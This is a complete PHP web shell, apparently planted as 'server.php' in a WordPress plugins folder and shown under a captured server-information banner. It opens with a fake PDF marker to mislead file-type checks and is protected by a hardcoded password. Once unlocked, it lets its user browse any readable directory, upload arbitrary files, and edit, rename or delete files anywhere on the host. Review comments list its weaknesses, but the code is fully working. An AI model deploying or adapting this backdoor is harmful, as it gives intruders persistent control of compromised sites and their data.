HEX
Server: Apache/2.4.52 (Ubuntu)
System: Linux WebLive 5.15.0-79-generic #86-Ubuntu SMP Mon Jul 10 16:07:21 UTC 2023 x86_64
User: ubuntu (1000)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
File: /var/www/html/wpprm/wp-content/plugins/server.php
<!-- %PDF-1.5 -->
<?php
// filemanager.php - Tailwind File Manager with Auth & Status Messages

// Access gate: a single shared password checked once per session.
// NOTE(review): if the `<!-- %PDF-1.5 -->` line shown before the opening tag is
// part of this file, it is emitted as output before session_start() and before
// every header() call below; those only work when output buffering is enabled
// (confirm). A PDF marker at the top of a .php file does not change how the
// server executes it; it may mislead checks that only sniff leading bytes.
session_start();
// NOTE(review): the credential is stored in plaintext in the source, so anyone
// who can read this file has it.
$auth_password = 'merdeka123'; // Replace with your own password
$status = '';
$status_class = '';

if (!isset($_SESSION['auth'])) {
    // The comparison uses ===, not hash_equals(), and nothing here limits or
    // records failed attempts. A POST without a 'password' field reads an
    // undefined index and falls through to the login form.
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['password'] === $auth_password) {
        // The session id is not regenerated after login (no session_regenerate_id()).
        $_SESSION['auth'] = true;
    } else {
        // Unauthenticated request: print the login form and stop. The form
        // loads its stylesheet from a third-party CDN.
        echo '<!DOCTYPE html><html><head><title>Login</title><link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet"></head><body class="bg-gray-100 flex items-center justify-center h-screen">
        <form method="post" class="bg-white shadow-md rounded px-8 pt-6 pb-8 mb-4">
            <h2 class="mb-4 text-xl font-bold">Login File Manager</h2>
            <input type="password" name="password" placeholder="Password" class="shadow appearance-none border rounded w-full py-2 px-3 text-gray-700 mb-3">
            <button class="bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded">Login</button>
        </form></body></html>';
        exit;
    }
}

// Directory to list. The value comes straight from ?path= and is only
// canonicalised by realpath(); it is never compared against a base directory,
// so any directory the PHP process can read can be listed.
if (isset($_GET['path'])) {
    $path = realpath($_GET['path']);
} else {
    $path = getcwd();
}
// realpath() returns false for a path that does not resolve; fall back to the
// script's working directory in that case or when the target is not a directory.
if (!$path || !is_dir($path)) {
    $path = getcwd();
}
$files = scandir($path);

/**
 * Escape a value for HTML text or a quoted HTML attribute.
 *
 * Encodes &, <, >, " and ' as entities (ENT_QUOTES) and treats input as UTF-8.
 * Entity encoding covers HTML contexts only: inside an inline event-handler
 * attribute the browser decodes entities before the script runs, so the
 * delete button's confirm('Delete ...') call is not protected by this helper.
 *
 * @param string $str Raw value.
 * @return string Entity-encoded value.
 */
function h($str) {
    $escaped = htmlspecialchars($str, ENT_QUOTES, 'UTF-8');
    return $escaped;
}

/**
 * Join a directory and an entry name with exactly one separator between them.
 *
 * Trailing separators on $base are stripped first. $file is appended verbatim:
 * separators and `..` segments inside it are not removed or rejected, so the
 * result can point outside $base when $file is caller-controlled.
 *
 * @param string $base Directory path.
 * @param string $file Entry name to append.
 * @return string Concatenated path (not canonicalised).
 */
function full_path($base, $file) {
    $sep = DIRECTORY_SEPARATOR;
    $dir = rtrim($base, $sep);
    return $dir . $sep . $file;
}

// POST dispatcher: every state-changing operation of the page goes through here.
// What the code shows, for triage:
//  - 'action', 'current' and the entry names all come from form fields; no
//    anti-CSRF token is checked and 'current' is not confined to a base directory.
//  - Names are joined with full_path() without stripping separators or `..`.
//  - Each handled action except 'chdir' ends in a redirect to
//    ?path=...&status=...&class=..., so the GET that follows a POST carries
//    'status' and 'class' query parameters (visible in access logs where
//    query strings are logged).
//  - A successful login POST also reaches this block; its action is '' so no
//    case matches and only the final redirect runs.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $action = $_POST['action'] ?? '';
    // realpath() returns false when the path does not resolve; that value is
    // passed to full_path() below without a check.
    $current = realpath($_POST['current'] ?? getcwd());

    switch ($action) {
        case 'upload':
            if (isset($_FILES['file'])) {
                // The client-supplied file name is used as the destination name;
                // no extension, type or size check is applied here.
                $success = move_uploaded_file($_FILES['file']['tmp_name'], full_path($current, $_FILES['file']['name']));
                $status = $success ? 'File berhasil di-upload.' : 'Gagal upload file.';
                $status_class = $success ? 'bg-green-100 text-green-700' : 'bg-red-100 text-red-700';
            }
            break;
        case 'newfile':
            // Creates the named file empty, or truncates it if it already exists.
            $success = file_put_contents(full_path($current, $_POST['name']), '') !== false;
            $status = $success ? 'File berhasil dibuat.' : 'Gagal membuat file.';
            $status_class = $success ? 'bg-green-100 text-green-700' : 'bg-red-100 text-red-700';
            break;
        case 'newfolder':
            $success = mkdir(full_path($current, $_POST['name']));
            $status = $success ? 'Folder berhasil dibuat.' : 'Gagal membuat folder.';
            $status_class = $success ? 'bg-green-100 text-green-700' : 'bg-red-100 text-red-700';
            break;
        case 'delete':
            $target = full_path($current, $_POST['name']);
            $success = false;
            if (is_file($target)) $success = unlink($target);
            // rmdir() only removes empty directories; there is no recursive delete.
            if (is_dir($target)) $success = rmdir($target);
            $status = $success ? 'Berhasil menghapus.' : 'Gagal menghapus.';
            $status_class = $success ? 'bg-green-100 text-green-700' : 'bg-red-100 text-red-700';
            break;
        case 'rename':
            // Both names are request fields; a 'new' value containing separators
            // makes this a move rather than a rename.
            $success = rename(full_path($current, $_POST['old']), full_path($current, $_POST['new']));
            $status = $success ? 'Berhasil rename.' : 'Gagal rename.';
            $status_class = $success ? 'bg-green-100 text-green-700' : 'bg-red-100 text-red-700';
            break;
        case 'save':
            // Writes the posted 'content' field verbatim to the named file,
            // replacing whatever the file held before.
            $success = file_put_contents(full_path($current, $_POST['name']), $_POST['content']) !== false;
            $status = $success ? 'Perubahan berhasil disimpan.' : 'Gagal menyimpan file.';
            $status_class = $success ? 'bg-green-100 text-green-700' : 'bg-red-100 text-red-700';
            break;
        case 'chdir':
            // Navigation only: redirect to the resolved directory, no status message.
            header("Location: ?path=" . urlencode(realpath(full_path($current, $_POST['name']))));
            exit;
    }
    // Post/redirect/get: the outcome text and its CSS classes travel in the URL.
    header("Location: ?path=" . urlencode($current) . "&status=" . urlencode($status) . "&class=" . urlencode($status_class));
    exit;
}

// File selected for the editor pane, taken from ?edit=. The template joins it
// to $path with full_path() and reads it with file_get_contents(), so the name
// is not limited to entries of the listed directory.
$editing = $_GET['edit'] ?? null;
// Status banner text and CSS classes are read back from the query string.
// Both are escaped with h() when rendered, but any request can set them, so
// the banner's wording is not proof that an operation took place.
if (isset($_GET['status'])) {
    $status_class = $_GET['class'] ?? 'bg-blue-100 text-blue-700';
    $status = $_GET['status'];
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>File Manager</title>
  <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet">
</head>
<body class="bg-gray-100 p-6">
  <div class="max-w-6xl mx-auto bg-white p-6 rounded shadow">
    <h1 class="text-2xl font-bold mb-4">Mini File Manager</h1>
    <p class="mb-2"><strong>Current Path:</strong> <?= h($path) ?></p>
    <div class="mb-4 text-sm text-blue-600">
      <?php
        // Breadcrumb trail: split the resolved path on the directory separator
        // and emit one link per segment, each pointing at the path accumulated
        // so far. Segment text is escaped with h(); link targets are
        // urlencode()d. $i is not used.
        $parts = explode(DIRECTORY_SEPARATOR, $path);
        $cumulative = "";
        foreach ($parts as $i => $part):
          // Skip the empty piece produced by the leading separator.
          if ($part === '') continue;
          $cumulative .= DIRECTORY_SEPARATOR . $part;
          echo '<a href="?path=' . urlencode($cumulative) . '" class="hover:underline">' . h($part) . '</a>/';
        endforeach;
      ?>
    </div>

    <?php if ($status): ?>
      <div class="mb-4 p-2 rounded <?= h($status_class) ?>">
        <?= h($status) ?>
      </div>
    <?php endif; ?>

    <div class="flex flex-wrap gap-4 mb-6">
      <form method="post" enctype="multipart/form-data" class="flex gap-2 items-center">
        <input type="hidden" name="action" value="upload">
        <input type="hidden" name="current" value="<?= h($path) ?>">
        <input type="file" name="file" class="text-sm">
        <button class="bg-blue-500 text-white px-4 py-1 rounded">Upload</button>
      </form>

      <form method="post" class="flex gap-2 items-center">
        <input type="hidden" name="action" value="newfile">
        <input type="hidden" name="current" value="<?= h($path) ?>">
        <input type="text" name="name" placeholder="New file" class="border p-1 rounded">
        <button class="bg-green-500 text-white px-4 py-1 rounded">New File</button>
      </form>

      <form method="post" class="flex gap-2 items-center">
        <input type="hidden" name="action" value="newfolder">
        <input type="hidden" name="current" value="<?= h($path) ?>">
        <input type="text" name="name" placeholder="New folder" class="border p-1 rounded">
        <button class="bg-yellow-500 text-white px-4 py-1 rounded">New Folder</button>
      </form>
    </div>

    <table class="w-full table-auto text-sm">
      <thead class="bg-gray-200">
        <tr><th class="text-left px-2 py-1">Name</th><th class="text-left px-2 py-1">Type</th><th class="text-left px-2 py-1">Actions</th></tr>
      </thead>
      <tbody>
        <?php foreach ($files as $f): 
          if ($f === '.') continue;
          $fp = full_path($path, $f);
        ?>
        <tr class="border-t">
          <td class="px-2 py-1">
            <?php if (is_dir($fp)): ?>
              <form method="post" class="inline">
                <input type="hidden" name="action" value="chdir">
                <input type="hidden" name="current" value="<?= h($path) ?>">
                <input type="hidden" name="name" value="<?= h($f) ?>">
                <button class="text-blue-600 hover:underline">📁 <?= h($f) ?></button>
              </form>
            <?php else: ?>
              <a href="?path=<?= urlencode($path) ?>&edit=<?= urlencode($f) ?>" class="text-gray-800 hover:underline">📄 <?= h($f) ?></a>
            <?php endif; ?>
          </td>
          <td class="px-2 py-1"><?= is_dir($fp) ? 'Folder' : 'File' ?></td>
          <td class="px-2 py-1">
            <div class="flex gap-2">
              <form method="post" class="inline">
                <input type="hidden" name="action" value="delete">
                <input type="hidden" name="current" value="<?= h($path) ?>">
                <input type="hidden" name="name" value="<?= h($f) ?>">
                <button class="bg-red-100 text-red-700 px-2 py-1 rounded text-xs" onclick="return confirm('Delete <?= h($f) ?>?')">Delete</button>
              </form>
              <form method="post" class="inline flex items-center gap-1">
                <input type="hidden" name="action" value="rename">
                <input type="hidden" name="current" value="<?= h($path) ?>">
                <input type="hidden" name="old" value="<?= h($f) ?>">
                <input type="text" name="new" value="<?= h($f) ?>" class="border px-1 py-0.5 text-xs rounded">
                <button class="bg-green-100 text-green-700 px-2 py-1 rounded text-xs">Rename</button>
              </form>
            </div>
          </td>
        </tr>
        <?php endforeach; ?>
      </tbody>
    </table>

    <?php if ($editing): 
      $edit_path = full_path($path, $editing);
      if (is_file($edit_path)): ?>
      <div class="mt-6">
        <h2 class="text-lg font-semibold mb-2">Editing: <?= h($editing) ?></h2>
        <form method="post">
          <input type="hidden" name="action" value="save">
          <input type="hidden" name="current" value="<?= h($path) ?>">
          <input type="hidden" name="name" value="<?= h($editing) ?>">
          <textarea name="content" class="w-full h-80 border p-2 font-mono text-sm"><?= h(file_get_contents($edit_path)) ?></textarea>
          <button class="mt-2 bg-blue-600 text-white px-4 py-1 rounded">Save</button>
        </form>
      </div>
    <?php endif; endif; ?>
  </div>
</body>
</html>